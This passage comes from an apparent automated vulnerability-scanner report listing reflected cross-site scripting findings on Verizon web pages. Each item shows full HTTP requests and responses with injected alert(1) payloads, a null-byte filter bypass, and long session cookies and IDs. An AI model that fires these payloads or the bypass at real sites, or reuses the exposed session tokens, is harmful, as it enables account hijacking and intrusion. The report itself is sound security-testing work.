Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A02V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Sat, 20 Nov 2010 00:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:50 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target">
...[SNIP]...

2.826. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a916'-alert(1)-'a4883ee17a5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CP=null*; myservices=vzdock=N; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:14:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:42 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:19:42 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133609

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
ipt">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();
}
...[SNIP]...

2.827. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc9f'-alert(1)-'ea90d6efe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:13:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:50 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:18:50 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133536

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

2.828. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002a4f1'-alert(1)-'e82375aa148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a4f1'-alert(1)-'e82375aa148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?%002a4f1'-alert(1)-'e82375aa148=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GGA02V
Content-Type: text/html; charset=utf-8
Expires: Sun, 21 Nov 2010 17:55:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 17:55:53 GMT
Connection: close
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffffa54c16b345525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sun, 21-Nov-2010 18:00:53 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131454

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?%002a4f1'-alert(1)-'e82375aa148=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

2.829. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64661
Expires: Sat, 20 Nov 2010 00:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<script language ="javascript">

// for check Availabiltity
var BannerID = "BannerDry1m55d47";6993170f2f3";    
var xmlSource = "<PROMOBANNERS>
...[SNIP]...

2.830. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b710b"><script>alert(1)</script>55aa320ee52 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Sat, 20 Nov 2010 02:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:39:02 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52"/>
...[SNIP]...

2.831. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx

Issue detail

The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 89a05%0aalert(1)//cc561db1e96 was submitted in the FlowRoute parameter. This input was echoed as 89a05
alert(1)//cc561db1e96
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx?FlowRoute=NB-NS89a05%0aalert(1)//cc561db1e96 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; 